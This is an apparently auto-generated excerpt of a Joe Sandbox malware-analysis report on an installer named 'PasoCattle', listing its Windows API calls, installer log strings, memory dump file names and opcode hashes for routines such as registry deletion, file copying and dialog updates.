                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                        • String ID: f
                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                        • MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                        Strings
                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                                        • String ID: !
                                                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
